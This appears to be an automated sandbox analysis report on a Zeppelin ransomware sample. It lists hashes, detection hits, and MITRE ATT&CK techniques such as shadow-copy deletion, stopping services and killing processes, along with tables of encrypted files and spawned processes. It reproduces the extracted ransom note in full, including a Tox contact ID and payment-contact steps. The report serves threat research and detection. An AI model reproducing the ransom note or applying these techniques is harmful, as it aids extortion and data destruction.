zeppelin | b8355b2216b7bb60a7d421a57de257fd251f0f7a20c861bf91693233117e5f2d

Analysis

max time kernel
162s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
24-07-2023 12:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
Size

225KB
MD5

3882feced4dec87fbf8780c44d15ea5e
SHA1

b6b92728e0a0fb2d95bec468709c11c4c2faf9f4
SHA256

b8355b2216b7bb60a7d421a57de257fd251f0f7a20c861bf91693233117e5f2d
SHA512

9d0703bbe3aadc8bd88a4153c7b7f45dd5c599e45fa78b1c50576701497b86021bb87cb3a197883ca9e5973f08f3fa3ece75302d655eecb07355efee8b15f44d
SSDEEP

6144:YSK1AqRHi/EXtw+apQ3an64DQFu/U3buRKlemZ9DnGAeOhoHwN+c:YosHiGWRpQb4DQFu/U3buRKlemZ9DnGm

Score

10^/10

zeppelin evasion ransomware

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Lang\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Ransom Note

!!! YOUR FILES HAVE BEEN ENCRYPTED !!! All your files, including documents, databases, and other crucial data, have been encrypted. I've uploaded some databases and important files from your computers to the cloud. You have 48 hours to get in touch with us and reach an agreement. If you don't contact us by the end of this period, I'll release your data publicly on the dark web. This could damage your company and your partners. We're the only ones capable of restoring your files. To prove that we have a functional decryption tool, we're offering you the chance to decrypt one file for free. You can reach out to us through an anonymous chat. Just follow the provided instructions. 1. Visit https://tox.chat/download.html 2. Download and install qTox on your computer. 3. Open it, click "New Profile," and create a new profile. 4. Press the + "Add to friends" button and enter my TOX ID DBA5908245E3067FDA9B0C0D6FEEADC3D3C965A29AC340CA14D539924700DC53948D5F860D7D 5. Click "Send friend request." 6. Keep qTox open and wait. In a few hours, I'll accept your request, and we can begin communicating. Your personal ID: B82-CAE-6A6

URLs

https://tox.chat/download.html

Signatures

Detects Zeppelin payload 20 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4184-133-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/4184-136-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1496-151-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/4184-308-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-650-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/4184-732-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-874-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/4184-964-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-1220-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-1686-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/4184-1816-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-3170-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-4471-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-5599-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-6509-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-7164-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/4184-7367-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-8751-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-10057-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin
behavioral2/memory/1036-11611-0x0000000000650000-0x0000000000793000-memory.dmp	family_zeppelin

Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
ransomware zeppelin
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (2985) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe

description	ioc	Process
File opened (read-only)	\??\Y:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\T:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\L:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\K:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\H:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\B:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\A:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\Z:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\U:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\Q:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\P:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\M:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\E:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\X:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\W:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\V:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\S:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\I:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\R:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\O:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\N:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\J:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened (read-only)	\??\G:	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe

Drops file in Program Files directory 64 IoCs

Processes:

2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Frosted Glass.eftx	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription5-ul-oob.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-pl.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_Subscription-ppd.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\nashorn.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_KMS_Automation-ul.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-ppd.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\rmid.exe.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\logging.properties	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-pl.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ul-oob.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_SubTrial-pl.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTrial-ppd.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-pl.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyDrop32x32.gif	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ul-phn.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ul-oob.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp4-ul-phn.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File created	C:\Program Files\Java\jre1.8.0_66\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul-oob.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_KMS_Client-ul.xrm-ms	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ul-phn.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\klist.exe.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-ul-oob.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-ppd.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\psfontj2d.properties.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-pl.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-ppd.xrm-ms.B82-CAE-6A6	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\java-rmi.exe	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
3748	sc.exe
208	sc.exe
3316	sc.exe
892	sc.exe
2688	sc.exe
4644	sc.exe
1640	sc.exe
1268	sc.exe
4040	sc.exe
4152	sc.exe
3820	sc.exe
840	sc.exe
4976	sc.exe
2792	sc.exe
4684	sc.exe
3548	sc.exe
4052	sc.exe
4600	sc.exe
912	sc.exe
2860	sc.exe
3576	sc.exe
2640	sc.exe
2096	sc.exe
1804	sc.exe
4588	sc.exe
2016	sc.exe
3184	sc.exe
4856	sc.exe
3480	sc.exe
4468	sc.exe
3728	sc.exe
4892	sc.exe
3812	sc.exe
2808	sc.exe
1528	sc.exe
4144	sc.exe
3068	sc.exe
3492	sc.exe
976	sc.exe
4476	sc.exe
4220	sc.exe
1980	sc.exe
4420	sc.exe
3596	sc.exe
4892	sc.exe
2912	sc.exe
5056	sc.exe
4680	sc.exe
2412	sc.exe
4600	sc.exe
2828	sc.exe
2628	sc.exe
4132	sc.exe
4112	sc.exe
3532	sc.exe
3692	sc.exe
3036	sc.exe
2316	sc.exe
2236	sc.exe
1380	sc.exe
2860	sc.exe
2032	sc.exe
4652	sc.exe
3160	sc.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
944	tasklist.exe
1116	tasklist.exe
4260	tasklist.exe
1428	tasklist.exe
3276	tasklist.exe
3136	tasklist.exe

Kills process with taskkill 25 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
1844	taskkill.exe
4320	taskkill.exe
3036	taskkill.exe
2016	taskkill.exe
432	taskkill.exe
4464	taskkill.exe
4236	taskkill.exe
2688	taskkill.exe
3780	taskkill.exe
1200	taskkill.exe
2912	taskkill.exe
2172	taskkill.exe
2096	taskkill.exe
3596	taskkill.exe
4936	taskkill.exe
4616	taskkill.exe
4776	taskkill.exe
4724	taskkill.exe
4452	taskkill.exe
4608	taskkill.exe
1920	taskkill.exe
1256	taskkill.exe
3912	taskkill.exe
4308	taskkill.exe
4640	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe

pid	Process
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe
4184	2023-07-15_3882feced4dec87fbf8780c44d15ea5e_zeppelin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3952	WMIC.exe
Token: SeSecurityPrivilege	3952	WMIC.exe
Token: SeTakeOwnershipPrivilege	3952	WMIC.exe
Token: SeLoadDriverPrivilege	3952	WMIC.exe
Token: SeSystemProfilePrivilege	3952	WMIC.exe
Token: SeSystemtimePrivilege	3952	WMIC.exe
Token: SeProfSingleProcessPrivilege	3952	WMIC.exe
Token: SeIncBasePriorityPrivilege	3952	WMIC.exe
Token: SeCreatePagefilePrivilege	3952	WMIC.exe
Token: SeBackupPrivilege	3952	WMIC.exe
Token: SeRestorePrivilege	3952	WMIC.exe
Token: SeShutdownPrivilege	3952	WMIC.exe
